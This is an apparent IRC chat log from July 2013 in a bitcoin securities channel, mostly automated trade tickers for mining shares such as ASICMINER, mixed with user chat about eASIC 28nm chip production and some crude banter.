[TAT.ASICMINER] 3 @ 0.043092 = 0.1293 BTC [+] Jul 18 12:54:43 [BTCTC] [TAT.ASICMINER] 5 @ 0.043499 = 0.2175 BTC [+] Jul 18 12:57:19 [BTCTC] [TAT.ASICMINER] 3 @ 0.043499 = 0.1305 BTC [+] Jul 18 12:59:50 [BTCTC] [TAT.ASICMINER] 34 @ 0.042605 = 1.4486 BTC [-] Jul 18 12:59:52 chaang-noi you here? Jul 18 13:01:18 [BTCTC] [TAT.ASICMINER] 9 @ 0.043498 = 0.3915 BTC [+] Jul 18 13:01:21 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003893 = 0.0389 BTC [-] Jul 18 13:07:24 [BTCTC] [TAT.ASICMINER] 1 @ 0.043496 BTC [-] Jul 18 13:08:14 [BTCTC] [AMC-PT] 398 @ 0.0025 = 0.995 BTC [+] Jul 18 13:10:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.043494 = 0.4349 BTC [-] Jul 18 13:11:25 [BTCTC] [TAT.VIRTUALMINE] 130 @ 0.003893 = 0.5061 BTC [-] Jul 18 13:14:06 what news Jul 18 13:14:07 [HAVELOCK] [AM100] 44 @ 0.04199 = 1.8476 BTC [+] Jul 18 13:16:41 [HAVELOCK] [AM100] 4 @ 0.04199 = 0.168 BTC [+] Jul 18 13:19:17 [HAVELOCK] [AM100] 52 @ 0.04199 = 2.1835 BTC [+] Jul 18 13:19:38 [BTCTC] [CRYPTO-TRADE] 1 @ 0.1948 BTC [-] Jul 18 13:20:52 oh yeah s.dice news Jul 18 13:21:15 [MPEX] [S.MPOE] 3148 @ 0.00088772 = 2.7945 BTC [+] Jul 18 13:21:16 [MPEX] [S.MPOE] 6083 @ 0.00088818 = 5.4028 BTC [+] Jul 18 13:21:35 [BTCTC] [PAJKA.BOND] 1 @ 0.05 BTC [+] Jul 18 13:24:34 mjr_: indeed, even at the end the asset behaved like a >99.9 roll xD Jul 18 13:25:01 dice indeed! xD Jul 18 13:28:00 this has gpt tp be trolling https://bitcointalk.org/index.php?topic=258216.msg2753198#msg2753198 Jul 18 13:29:30 [BTCTC] [TAT.ASICMINER] 33 @ 0.042613 = 1.4062 BTC [-] Jul 18 13:29:34 [BTCTC] [TAT.ASICMINER] 50 @ 0.042613 = 2.1307 BTC [-] Jul 18 13:29:43 maybe mp bought it Jul 18 13:29:56 what in the mother of fuck is a "terrahash" Jul 18 13:30:23 [BTCTC] [TAT.ASICMINER] 27 @ 0.042612 = 1.1505 BTC [-] Jul 18 13:30:28 terra- = something to do with the earth (ie. terraforming) Jul 18 13:30:49 [BTCTC] [TAT.ASICMINER] 7 @ 0.042613 = 0.2983 BTC [+] Jul 18 13:31:36 [BTCTC] [ASICMINER-PT] 1 @ 4.638 BTC [-] Jul 18 13:32:51 [BTCTC] [TAT.VIRTUALMINE] 2 @ 0.0039 = 0.0078 BTC [+] Jul 18 13:33:40 yep, http://thegenesisblock.com/latest-shipment-of-avalon-asics-could-increase-network-hashrate-by-500/ Jul 18 13:33:59 [BTCTC] [GSDPT] 50 @ 0.00342 = 0.171 BTC [+] Jul 18 13:34:21 [BTCTC] [ASICMINER-PT] 1 @ 4.62 BTC [-] Jul 18 13:34:23 [BTCTC] [ASICMINER-PT] 1 @ 4.638 BTC [+] Jul 18 13:34:25 [BTCTC] [ASICMINER-PT] 1 @ 4.639 BTC [+] Jul 18 13:34:27 [BTCTC] [ASICMINER-PT] 1 @ 4.669 BTC [+] Jul 18 13:34:28 [BTCTC] [ASICMINER-PT] 2 @ 4.66999 = 9.34 BTC [+] Jul 18 13:34:29 [BTCTC] [ASICMINER-PT] 1 @ 4.696 BTC [+] Jul 18 13:34:31 [BTCTC] [ASICMINER-PT] 5 @ 4.697 = 23.485 BTC [+] Jul 18 13:35:22 [BTCTC] [DMS.MINING] 1 @ 0.01595 BTC [+] Jul 18 13:35:33 [BTCTC] [ASICMINER-PT] 10 @ 4.619 = 46.19 BTC [-] Jul 18 13:35:55 the money is in bulk chip sales Jul 18 13:36:11 dunno why asicminer doesn't do it Jul 18 13:36:29 [BTCTC] [TAT.ASICMINER] 2 @ 0.04349 = 0.087 BTC [+] Jul 18 13:36:29 hehe Jul 18 13:36:32 exactly Jul 18 13:36:42 minimum logistics Jul 18 13:37:08 xD Jul 18 13:37:09 [BTCTC] [ASICMINER-PT] 2 @ 4.6379 = 9.2758 BTC [+] Jul 18 13:37:12 [BTCTC] [ASICMINER-PT] 1 @ 4.696 BTC [+] Jul 18 13:37:14 [BTCTC] [ASICMINER-PT] 1 @ 4.699 BTC [+] Jul 18 13:37:15 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 18 13:37:23 exactly Jul 18 13:37:30 [BTCTC] [AMC-PT] 3102 @ 0.0025 = 7.755 BTC [+] Jul 18 13:37:42 [BTCTC] [BITVPS] 100 @ 0.001973 = 0.1973 BTC [+] Jul 18 13:37:52 I'm just waiting for the whole ActM deal to move forward Jul 18 13:37:53 [BTCTC] [ASICMINER-PT] 1 @ 4.651 BTC [-] Jul 18 13:38:02 for the bulk chips revenue Jul 18 13:38:16 ActiveMining Jul 18 13:38:17 [BTCTC] [TAT.ASICMINER] 16 @ 0.043489 = 0.6958 BTC [-] Jul 18 13:38:45 the chips will be done with eAsic Jul 18 13:38:45 [BTCTC] [TAT.ASICMINER] 4 @ 0.043489 = 0.174 BTC [-] Jul 18 13:39:00 16GH/s chips at ~15W Jul 18 13:39:06 28nm Jul 18 13:39:34 exactly Jul 18 13:39:47 VMC is just the hardware division's name Jul 18 13:40:17 eAsic is doing the whole heavy lifting Jul 18 13:40:39 Ken just gave them the optimized xilinx RTL code he optimized Jul 18 13:40:44 [BTCTC] [TAT.ASICMINER] 52 @ 0.043488 = 2.2614 BTC [-] Jul 18 13:40:46 [BTCTC] [TAT.ASICMINER] 30 @ 0.043489 = 1.3047 BTC [+] Jul 18 13:40:48 [BTCTC] [TAT.ASICMINER] 93 @ 0.0435 = 4.0455 BTC [+] Jul 18 13:40:49 [BTCTC] [TAT.ASICMINER] 25 @ 0.0436 = 1.09 BTC [+] Jul 18 13:41:11 nope lol Jul 18 13:41:21 [HAVELOCK] [AM100] 61 @ 0.041999 = 2.5619 BTC [+] Jul 18 13:41:36 how many LUTs? Jul 18 13:43:10 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jul 18 13:43:13 this is eAsic's 45nm chip http://www.easic.com/high-speed-transceivers-low-cost-power-fpga-nre-asic-45nm-easic-nextreme-2/easic-nextreme-2-look-up-table-lut-architecture/ Jul 18 13:44:00 the 28nm one is almost 2x "eCells" Jul 18 13:44:07 yep Jul 18 13:44:13 [HAVELOCK] [AM100] 90 @ 0.04199 = 3.7791 BTC [-] Jul 18 13:44:55 the 16GH/s are their simulation results at 800MHz Jul 18 13:45:33 yeah Jul 18 13:46:44 [BTCTC] [S.BBET-PT] 1 @ 0.001969 BTC [+] Jul 18 13:46:50 check the front page Jul 18 13:46:58 4th Generation Jul 18 13:46:58 28nm NEW ASICs Jul 18 13:46:58 Register now for early access. Jul 18 13:47:02 xD Jul 18 13:47:32 but the best part of eAsic isn't even this Jul 18 13:47:37 it's this: http://www.easic.com/migration-to-cell-based-asic/migration-to-cell-based-asic-overview/ Jul 18 13:48:06 and this: http://www.easic.com/migration-to-cell-based-asic/migration-to-cell-based-asic-simple-design-flow/ Jul 18 13:48:56 that's a HUGE upgrade path indeed Jul 18 13:49:09 [BTCTC] [ASICMINER-PT] 1 @ 4.6799 BTC [+] Jul 18 13:49:13 [BTCTC] [ASICMINER-PT] 1 @ 4.68 BTC [+] Jul 18 13:49:15 [BTCTC] [ASICMINER-PT] 10 @ 4.689 = 46.89 BTC [+] Jul 18 13:49:17 [BTCTC] [ASICMINER-PT] 1 @ 4.69 BTC [+] Jul 18 13:49:19 [BTCTC] [ASICMINER-PT] 1 @ 4.69999 BTC [+] Jul 18 13:49:21 [BTCTC] [ASICMINER-PT] 10 @ 4.7 = 47 BTC [+] Jul 18 13:49:36 [BTCTC] [TAT.ASICMINER] 19 @ 0.043599 = 0.8284 BTC [-] Jul 18 13:49:53 [BTCTC] [GSDPT] 100 @ 0.00342 = 0.342 BTC [+] Jul 18 13:49:58 other cool thing is that for their nextreme chips, only the metal layer needs to be done Jul 18 13:50:08 the logic is always the same Jul 18 13:50:13 http://www.easic.com/high-speed-transceivers-low-cost-power-fpga-nre-asic-45nm-easic-nextreme-2/easic-nextreme-2-fast-turnaround-asics-manufacturing/ Jul 18 13:50:16 45nm eASIC Nextreme-2 Fast Turnaround ASICs | eASIC Corporation Jul 18 13:50:35 [BTCTC] [TAT.ASICMINER] 45 @ 0.0436 = 1.962 BTC [+] Jul 18 13:50:45 they even give the possibility to use e-beam to burn the metal layer, for a low volume process Jul 18 13:50:59 for some extra prototype chips Jul 18 13:51:13 [BTCTC] [TAT.ASICMINER] 6 @ 0.043645 = 0.2619 BTC [+] Jul 18 13:51:22 [BTCTC] [S.BBET-PT] 99 @ 0.001969 = 0.1949 BTC [+] Jul 18 13:51:22 I've talked to ken so get some of these going Jul 18 13:51:45 sending some to trusted community members would be awesome Jul 18 13:51:50 [MPEX] [S.MPOE] 2124 @ 0.00088838 = 1.8869 BTC [+] Jul 18 13:51:51 [MPEX] [S.MPOE] 11776 @ 0.00088768 = 10.4533 BTC [-] Jul 18 13:52:16 https://bitcointalk.org/index.php?topic=252531.0 Jul 18 13:52:22 [ActiveMining] The Official Active Mining Discussion Thread Jul 18 13:52:49 [BTCTC] [ASICMINER-PT] 3 @ 4.699 = 14.097 BTC [-] Jul 18 13:53:02 if you buy https://btct.co/security/AMC-PT the shares will be converted to https://btct.co/security/ACTIVEMINING when it's approved Jul 18 13:54:02 [BTCTC] [S.DICE-PT] 25 @ 0.00342 = 0.0855 BTC [+] Jul 18 13:54:21 [BTCTC] [TAT.ASICMINER] 3 @ 0.04365 = 0.131 BTC [+] Jul 18 13:54:23 [BTCTC] [TAT.ASICMINER] 15 @ 0.04365 = 0.6548 BTC [+] Jul 18 13:54:54 [BTCTC] [TAT.ASICMINER] 100 @ 0.04365 = 4.365 BTC [+] Jul 18 13:55:55 [BTCTC] [LTC-ATF.B2] 3 @ 0.0102 = 0.0306 BTC [-] Jul 18 13:56:32 [MPEX] [S.MPOE] 2476 @ 0.0008897 = 2.2029 BTC [+] Jul 18 13:56:33 yes, 20k chips Jul 18 13:56:53 to get the ball rolling Jul 18 13:57:38 buwah-hah Jul 18 13:57:39 ha ha Jul 18 13:57:41 ha ha ha Jul 18 13:57:44 right. Jul 18 14:00:25 I doubt its going to be super effective Jul 18 14:01:12 "i know nothing about this company or their plans" => so you're like all their shareholders Jul 18 14:01:39 it was a joke on the shareholders Jul 18 14:01:40 [BTCTC] [GSDPT] 30 @ 0.003103 = 0.0931 BTC [-] Jul 18 14:01:52 joke? Jul 18 14:02:00 well no you didn't get the joke Jul 18 14:02:06 mjr_: because I can do THE MAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAATH Jul 18 14:02:07 and it's funny because it's true Jul 18 14:02:11 seems not Jul 18 14:02:18 [BTCTC] [TAT.ASICMINER] 16 @ 0.04365 = 0.6984 BTC [+] Jul 18 14:02:23 ;;ticker Jul 18 14:02:24 MtGox BTCUSD ticker | Best bid: 87.81002, Best ask: 88.00000, Bid-ask spread: 0.18998, Last trade: 87.81002, 24 hour volume: 45719.80987958, 24 hour low: 87.52000, 24 hour high: 98.97990, 24 hour vwap: 92.40301 Jul 18 14:02:35 oh fuck new hpmore chaper Jul 18 14:02:37 *chapter Jul 18 14:02:55 yes Jul 18 14:02:58 but we're getting ot the point Jul 18 14:03:01 eAsic works this way: you give then an RTL, they give you back a device working Jul 18 14:03:10 that nothing will be efficient enough Jul 18 14:03:12 simple as that Jul 18 14:03:14 in 2 years Jul 18 14:03:19 THUS THE END OF BITCOIN Jul 18 14:03:23 [BTCTC] [GSDPT] 39 @ 0.003103 = 0.121 BTC [-] Jul 18 14:03:24 MUWAHAHAHAHAH Jul 18 14:03:32 mjr_: I know Jul 18 14:03:37 [BTCTC] [TAT.ASICMINER] 79 @ 0.043686 = 3.4512 BTC [+] Jul 18 14:03:39 but its less ridiculous than Jul 18 14:03:39 [BTCTC] [TAT.ASICMINER] 25 @ 0.043686 = 1.0922 BTC [+] Jul 18 14:03:45 people using some sort of weird virtual currency Jul 18 14:03:48 that is used to buy drugs and porn Jul 18 14:03:52 I mean, seriously Jul 18 14:03:54 who buys porn Jul 18 14:04:21 [BTCTC] [GSDPT] 1 @ 0.003101 BTC [-] Jul 18 14:04:22 [BTCTC] [GSDPT] 30 @ 0.003101 = 0.093 BTC [-] Jul 18 14:04:50 hrm, no interesting boobs =/ Jul 18 14:04:51 mjr_: design flow: http://m.eet.com/media/1061405/easic-ocp-fig4.gif Jul 18 14:05:13 bam, chip! Jul 18 14:05:17 what kind of porn can you buy with bitcoin? Jul 18 14:05:42 [BTCTC] [TAT.ASICMINER] 30 @ 0.043687 = 1.3106 BTC [+] Jul 18 14:05:44 [BTCTC] [TAT.ASICMINER] 109 @ 0.043688 = 4.762 BTC [+] Jul 18 14:06:12 you know Jul 18 14:06:16 Ive seen camwhores Jul 18 14:06:16 [BTCTC] [ASICMINER-PT] 1 @ 4.6799 BTC [-] Jul 18 14:06:18 [BTCTC] [ASICMINER-PT] 10 @ 4.68 = 46.8 BTC [+] Jul 18 14:06:20 [BTCTC] [ASICMINER-PT] 3 @ 4.699 = 14.097 BTC [+] Jul 18 14:06:20 I dont get why people fap to that Jul 18 14:06:21 [BTCTC] [ASICMINER-PT] 1 @ 4.7 BTC [+] Jul 18 14:06:23 [BTCTC] [ASICMINER-PT] 10 @ 4.7 = 47 BTC [+] Jul 18 14:06:25 [BTCTC] [ASICMINER-PT] 3 @ 4.7 = 14.1 BTC [+] Jul 18 14:07:09 [BTCTC] [TAT.ASICMINER] 3 @ 0.043699 = 0.1311 BTC [+] Jul 18 14:07:15 but Jul 18 14:07:18 I have access to real girls Jul 18 14:07:20 Diablo-D3 http://global3.memecdn.com/now-who-wants-boobs_o_1020089.jpg Jul 18 14:07:43 mircea_popescu: meh, I used to weigh 340, that does not scare me Jul 18 14:08:04 [BTCTC] [S.DICE-PT] 91 @ 0.00342 = 0.3112 BTC [+] Jul 18 14:08:15 lol Jul 18 14:08:46 they wernt quite THAT big though Jul 18 14:09:31 [BTCTC] [TAT.ASICMINER] 100 @ 0.043689 = 4.3689 BTC [-] Jul 18 14:09:48 [HAVELOCK] [AM1] 10 @ 4.4 = 44 BTC [-] Jul 18 14:11:11 mjr_: agreed Jul 18 14:11:23 [HAVELOCK] [AM100] 39 @ 0.041999 = 1.638 BTC [+] Jul 18 14:11:26 ew Jul 18 14:11:59 [HAVELOCK] [AM100] 80 @ 0.0419999 = 3.36 BTC [+] Jul 18 14:12:25 and whoever does it first with enough volume will profit very well Jul 18 14:12:27 [HAVELOCK] [AM100] 15 @ 0.042 = 0.63 BTC [+] Jul 18 14:12:56 [HAVELOCK] [AM100] 8 @ 0.042 = 0.336 BTC [+] Jul 18 14:12:58 [BTCTC] [TAT.ASICMINER] 60 @ 0.043688 = 2.6213 BTC [-] Jul 18 14:13:28 yep, fast turnaround is key Jul 18 14:14:01 ONCE 28NM CHIPS ARE MASS PRODUCED, ZEON WILL WIN THE WAR AGAINST THE FEDERATION! Jul 18 14:14:12 no zaku, boy, no zaku! Jul 18 14:14:22 [HAVELOCK] [AM100] 5 @ 0.042 = 0.21 BTC [+] Jul 18 14:16:07 [BTCTC] [S.MPOE-PT] 3 @ 0.000819 = 0.0025 BTC [-] Jul 18 14:16:49 [BTCTC] [BITVPS] 3 @ 0.001803 = 0.0054 BTC [-] Jul 18 14:17:34 [HAVELOCK] [AM100] 20 @ 0.042 = 0.84 BTC [+] Jul 18 14:19:31 [BTCTC] [AMC-PT] 31 @ 0.0025 = 0.0775 BTC [+] Jul 18 14:19:45 [HAVELOCK] [SDSTM] 48 @ 0.01 = 0.48 BTC [-] Jul 18 14:20:38 [BTCTC] [TAT.ASICMINER] 1 @ 0.043788 BTC [+] Jul 18 14:21:06 [HAVELOCK] [AM100] 3 @ 0.042 = 0.126 BTC [+] Jul 18 14:21:14 [BTCTC] [DMS.MINING] 30 @ 0.015949 = 0.4785 BTC [-] Jul 18 14:21:25 [HAVELOCK] [AM1] 1 @ 4.44 BTC [+] Jul 18 14:22:02 [BTCTC] [S.DICE-PT] 204 @ 0.00342 = 0.6977 BTC [+] Jul 18 14:22:34 [BTCTC] [DMS.MINING] 1 @ 0.01595 BTC [+] Jul 18 14:23:36 [BTCTC] [BTC-TRADING-PT] 2 @ 0.9687 = 1.9374 BTC [-] Jul 18 14:23:52 [BTCTC] [ASICMINER-PT] 1 @ 4.685 BTC [-] Jul 18 14:23:54 [BTCTC] [ASICMINER-PT] 10 @ 4.69 = 46.9 BTC [+] Jul 18 14:23:56 [BTCTC] [ASICMINER-PT] 5 @ 4.7 = 23.5 BTC [+] Jul 18 14:24:38 [BTCTC] [S.DICE-PT] 300 @ 0.003421 = 1.0263 BTC [+] Jul 18 14:25:50 [BTCTC] [TAT.ASICMINER] 3 @ 0.043788 = 0.1314 BTC [+] Jul 18 14:26:43 [BTCTC] [TAT.ASICMINER] 15 @ 0.043788 = 0.6568 BTC [+] Jul 18 14:27:21 [BTCTC] [S.DICE-PT] 766 @ 0.00343 = 2.6274 BTC [+] Jul 18 14:29:15 [BTCTC] [S.DICE-PT] 250 @ 0.0025 = 0.625 BTC [-] Jul 18 14:30:39 [BTCTC] [TAT.ASICMINER] 42 @ 0.043788 = 1.8391 BTC [+] Jul 18 14:30:41 [BTCTC] [TAT.ASICMINER] 54 @ 0.043996 = 2.3758 BTC [+] Jul 18 14:30:43 [BTCTC] [TAT.ASICMINER] 4 @ 0.043996 = 0.176 BTC [+] Jul 18 14:31:42 [BTCTC] [TAT.ASICMINER] 2 @ 0.043996 = 0.088 BTC [+] Jul 18 14:31:44 [BTCTC] [TAT.ASICMINER] 2 @ 0.043996 = 0.088 BTC [+] Jul 18 14:32:10 [BTCTC] [TAT.ASICMINER] 1 @ 0.043996 BTC [+] Jul 18 14:34:54 [BTCTC] [S.DICE-PT] 200 @ 0.00335 = 0.67 BTC [+] Jul 18 14:34:56 [BTCTC] [S.DICE-PT] 1 @ 0.003301 BTC [-] Jul 18 14:34:57 [BTCTC] [S.DICE-PT] 49 @ 0.0033 = 0.1617 BTC [-] Jul 18 14:40:45 [BTCTC] [ASICMINER-PT] 1 @ 4.635 BTC [-] Jul 18 14:41:00 [BTCTC] [AMC-PT] 150 @ 0.0025 = 0.375 BTC [+] Jul 18 14:41:07 [HAVELOCK] [AM100] 5 @ 0.042 = 0.21 BTC [+] Jul 18 14:50:13 [HAVELOCK] [AM1] 1 @ 4.44 BTC [+] Jul 18 14:50:48 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 14:52:07 [BTCTC] [TAT.ASICMINER] 26 @ 0.043996 = 1.1439 BTC [+] Jul 18 14:52:50 [BTCTC] [ASICMINER-PT] 51 @ 4.65 = 237.15 BTC [+] Jul 18 14:52:53 [BTCTC] [ASICMINER-PT] 1 @ 4.6999 BTC [+] Jul 18 14:52:55 [BTCTC] [ASICMINER-PT] 10 @ 4.7 = 47 BTC [+] Jul 18 14:56:09 [HAVELOCK] [SDSTM] 3 @ 0.0101 = 0.0303 BTC [+] Jul 18 14:56:22 [HAVELOCK] [SDSTM] 1 @ 0.00971 BTC [-] Jul 18 14:56:34 [HAVELOCK] [SDSTM] 40 @ 0.009611 = 0.3844 BTC [-] Jul 18 14:56:43 [HAVELOCK] [SDSTM] 10 @ 0.00961 = 0.0961 BTC [-] Jul 18 14:56:54 [HAVELOCK] [SDSTM] 228 @ 0.00960001 = 2.1888 BTC [-] Jul 18 14:57:20 [BTCTC] [ASICMINER-PT] 58 @ 4.7 = 272.6 BTC [+] Jul 18 14:58:09 [BTCTC] [ASICMINER-PT] 50 @ 4.699 = 234.95 BTC [-] Jul 18 14:58:55 [MPEX] [S.MPOE] 5150 @ 0.00088897 = 4.5782 BTC [-] Jul 18 15:00:37 [BTCTC] [TAT.ASICMINER] 2 @ 0.043996 = 0.088 BTC [+] Jul 18 15:03:32 [BTCTC] [TAT.ASICMINER] 1 @ 0.043996 BTC [+] Jul 18 15:05:03 [BTCTC] [TAT.ASICMINER] 18 @ 0.043996 = 0.7919 BTC [+] Jul 18 15:05:48 [HAVELOCK] [HIM] 1 @ 0.268 BTC [+] Jul 18 15:07:32 [BTCTC] [BASIC-MINING] 2 @ 0.78691 = 1.5738 BTC [-] Jul 18 15:08:09 [BTCTC] [AMC-PT] 1 @ 0.0025 BTC [+] Jul 18 15:08:58 [BTCTC] [TAT.ASICMINER] 5 @ 0.043997 = 0.22 BTC [+] Jul 18 15:09:54 [BTCTC] [TAT.ASICMINER] 4 @ 0.043997 = 0.176 BTC [+] Jul 18 15:10:10 [BTCTC] [AMC-PT] 12 @ 0.0025 = 0.03 BTC [+] Jul 18 15:10:39 [BTCTC] [TAT.ASICMINER] 164 @ 0.043997 = 7.2155 BTC [+] Jul 18 15:11:28 [HAVELOCK] [AM100] 2 @ 0.042 = 0.084 BTC [+] Jul 18 15:12:55 [BTCTC] [TAT.ASICMINER] 8 @ 0.043997 = 0.352 BTC [+] Jul 18 15:13:51 [HAVELOCK] [HIM] 12 @ 0.268 = 3.216 BTC [+] Jul 18 15:14:01 [HAVELOCK] [HIM] 1 @ 0.268 BTC [+] Jul 18 15:14:43 [BTCTC] [TAT.ASICMINER] 1 @ 0.043997 BTC [+] Jul 18 15:15:17 [HAVELOCK] [AM100] 96 @ 0.04199 = 4.031 BTC [-] Jul 18 15:17:05 [BTCTC] [TAT.ASICMINER] 46 @ 0.043998 = 2.0239 BTC [+] Jul 18 15:18:09 [BTCTC] [AMC-PT] 3 @ 0.002499 = 0.0075 BTC [-] Jul 18 15:19:57 [HAVELOCK] [AM100] 20 @ 0.04150001 = 0.83 BTC [-] Jul 18 15:19:58 [HAVELOCK] [AM100] 1 @ 0.0415 BTC [-] Jul 18 15:20:00 [HAVELOCK] [AM100] 100 @ 0.0415 = 4.15 BTC [-] Jul 18 15:20:01 [HAVELOCK] [AM100] 50 @ 0.04132288 = 2.0661 BTC [-] Jul 18 15:20:02 [HAVELOCK] [AM100] 110 @ 0.041322 = 4.5454 BTC [-] Jul 18 15:20:23 [HAVELOCK] [AM100] 1 @ 0.04126201 BTC [-] Jul 18 15:20:24 [HAVELOCK] [AM100] 7 @ 0.04126201 = 0.2888 BTC [-] Jul 18 15:20:26 [HAVELOCK] [AM100] 1 @ 0.04126 BTC [-] Jul 18 15:20:27 [HAVELOCK] [AM100] 390 @ 0.04125 = 16.0875 BTC [-] Jul 18 15:20:54 [BTCTC] [BASIC-MINING] 2 @ 0.78691 = 1.5738 BTC [-] Jul 18 15:21:42 [BTCTC] [ASICMINER-PT] 10 @ 4.698 = 46.98 BTC [-] Jul 18 15:22:33 [HAVELOCK] [AM1] 2 @ 4.44 = 8.88 BTC [+] Jul 18 15:22:42 [BTCTC] [TAT.ASICMINER] 14 @ 0.043999 = 0.616 BTC [+] Jul 18 15:23:37 [HAVELOCK] [AM100] 49 @ 0.041121 = 2.0149 BTC [-] Jul 18 15:23:40 [MPEX] [S.MPOE] 18148 @ 0.00088897 = 16.133 BTC [-] Jul 18 15:23:45 [MPEX] [S.MPOE] 102 @ 0.0008897 = 0.0907 BTC [+] Jul 18 15:26:47 [BTCTC] [TAT.ASICMINER] 86 @ 0.043999 = 3.7839 BTC [+] Jul 18 15:26:49 [BTCTC] [TAT.ASICMINER] 10 @ 0.044 = 0.44 BTC [+] Jul 18 15:26:51 [BTCTC] [TAT.ASICMINER] 200 @ 0.044 = 8.8 BTC [+] Jul 18 15:26:53 [BTCTC] [TAT.ASICMINER] 25 @ 0.044001 = 1.1 BTC [+] Jul 18 15:26:55 [BTCTC] [DMS.SELLING] 1 @ 0.024778 BTC [-] Jul 18 15:26:56 [BTCTC] [TAT.ASICMINER] 100 @ 0.0442 = 4.42 BTC [+] Jul 18 15:26:57 [BTCTC] [TAT.ASICMINER] 3 @ 0.0443 = 0.1329 BTC [+] Jul 18 15:26:58 [BTCTC] [TAT.ASICMINER] 23 @ 0.044499 = 1.0235 BTC [+] Jul 18 15:27:00 [BTCTC] [TAT.ASICMINER] 10 @ 0.0445 = 0.445 BTC [+] Jul 18 15:27:02 [BTCTC] [TAT.ASICMINER] 7 @ 0.0445 = 0.3115 BTC [+] Jul 18 15:27:13 [BTCTC] [TAT.ASICMINER] 100 @ 0.0445 = 4.45 BTC [+] Jul 18 15:27:15 [BTCTC] [TAT.ASICMINER] 5 @ 0.04459 = 0.223 BTC [+] Jul 18 15:27:17 [BTCTC] [TAT.ASICMINER] 99 @ 0.04459 = 4.4144 BTC [+] Jul 18 15:27:19 [BTCTC] [TAT.ASICMINER] 200 @ 0.0446 = 8.92 BTC [+] Jul 18 15:27:21 [BTCTC] [TAT.ASICMINER] 25 @ 0.0447 = 1.1175 BTC [+] Jul 18 15:27:23 [BTCTC] [TAT.ASICMINER] 100 @ 0.0447 = 4.47 BTC [+] Jul 18 15:27:24 [BTCTC] [TAT.ASICMINER] 9 @ 0.0448 = 0.4032 BTC [+] Jul 18 15:27:26 [BTCTC] [TAT.ASICMINER] 4 @ 0.0448 = 0.1792 BTC [+] Jul 18 15:27:28 [BTCTC] [TAT.ASICMINER] 94 @ 0.0448 = 4.2112 BTC [+] Jul 18 15:28:08 [BTCTC] [AMC-PT] 453 @ 0.002499 = 1.132 BTC [-] Jul 18 15:28:10 [BTCTC] [AMC-PT] 88 @ 0.002496 = 0.2196 BTC [-] Jul 18 15:28:12 [BTCTC] [AMC-PT] 25 @ 0.002492 = 0.0623 BTC [-] Jul 18 15:28:16 [BTCTC] [AMC-PT] 27 @ 0.00249 = 0.0672 BTC [-] Jul 18 15:28:18 [BTCTC] [AMC-PT] 60 @ 0.002481 = 0.1489 BTC [-] Jul 18 15:28:20 [BTCTC] [AMC-PT] 1 @ 0.002479 BTC [-] Jul 18 15:28:21 [BTCTC] [AMC-PT] 130 @ 0.002479 = 0.3223 BTC [-] Jul 18 15:28:23 [BTCTC] [AMC-PT] 100 @ 0.002478 = 0.2478 BTC [-] Jul 18 15:28:24 [BTCTC] [TAT.ASICMINER] 6 @ 0.0448 = 0.2688 BTC [+] Jul 18 15:28:25 [BTCTC] [AMC-PT] 29 @ 0.002472 = 0.0717 BTC [-] Jul 18 15:28:27 [BTCTC] [TAT.ASICMINER] 194 @ 0.04495 = 8.7203 BTC [+] Jul 18 15:28:28 [BTCTC] [AMC-PT] 75 @ 0.00247 = 0.1853 BTC [-] Jul 18 15:28:31 [BTCTC] [AMC-PT] 12 @ 0.00247 = 0.0296 BTC [-] Jul 18 15:28:50 [BTCTC] [TAT.ASICMINER] 15 @ 0.044 = 0.66 BTC [-] Jul 18 15:29:11 [HAVELOCK] [AM100] 25 @ 0.042 = 1.05 BTC [+] Jul 18 15:29:13 [BTCTC] [TAT.ASICMINER] 10 @ 0.044 = 0.44 BTC [-] Jul 18 15:29:15 [BTCTC] [TAT.ASICMINER] 7 @ 0.04495 = 0.3147 BTC [+] Jul 18 15:29:43 [BTCTC] [TAT.ASICMINER] 6 @ 0.04495 = 0.2697 BTC [+] Jul 18 15:30:48 [BTCTC] [S.DICE-PT] 323 @ 0.00344 = 1.1111 BTC [+] Jul 18 15:31:28 [BTCTC] [S.DICE-PT] 4 @ 0.00344 = 0.0138 BTC [+] Jul 18 15:32:22 [HAVELOCK] [AM100] 5 @ 0.042 = 0.21 BTC [+] Jul 18 15:32:37 [BTCTC] [CRYPTO-TRADE] 3 @ 0.19999 = 0.6 BTC [+] Jul 18 15:37:32 [BTCTC] [BASIC-MINING] 2 @ 0.691054 = 1.3821 BTC [-] Jul 18 15:37:34 [BTCTC] [BASIC-MINING] 3 @ 0.691053 = 2.0732 BTC [-] Jul 18 15:37:35 [BTCTC] [BASIC-MINING] 1 @ 0.691 BTC [-] Jul 18 15:37:37 [BTCTC] [BASIC-MINING] 1 @ 0.6901 BTC [-] Jul 18 15:37:38 [BTCTC] [BASIC-MINING] 1 @ 0.69 BTC [-] Jul 18 15:37:40 [BTCTC] [BASIC-MINING] 30 @ 0.686963 = 20.6089 BTC [-] Jul 18 15:37:41 [BTCTC] [BASIC-MINING] 30 @ 0.686962 = 20.6089 BTC [-] Jul 18 15:37:42 [BTCTC] [BASIC-MINING] 2 @ 0.686956 = 1.3739 BTC [-] Jul 18 15:38:20 [BTCTC] [TAT.ASICMINER] 3 @ 0.0448 = 0.1344 BTC [-] Jul 18 15:43:54 [BTCTC] [S.BBET-PT] 148 @ 0.001968 = 0.2913 BTC [-] Jul 18 15:44:15 [BTCTC] [TAT.VIRTUALMINE] 10 @ 0.003901 = 0.039 BTC [+] Jul 18 15:44:17 [BTCTC] [TAT.VIRTUALMINE] 8 @ 0.0039 = 0.0312 BTC [-] Jul 18 15:44:19 [BTCTC] [TAT.VIRTUALMINE] 230 @ 0.003893 = 0.8954 BTC [-] Jul 18 15:44:21 [MPEX] [S.MPOE] 2624 @ 0.00088768 = 2.3293 BTC [-] Jul 18 15:44:22 [BTCTC] [TAT.VIRTUALMINE] 1000 @ 0.0035 = 3.5 BTC [-] Jul 18 15:44:23 [MPEX] [S.MPOE] 3576 @ 0.00088759 = 3.174 BTC [-] Jul 18 15:47:13 [BTCTC] [B.YABMC] 80 @ 0.002499 = 0.1999 BTC [-] Jul 18 15:47:15 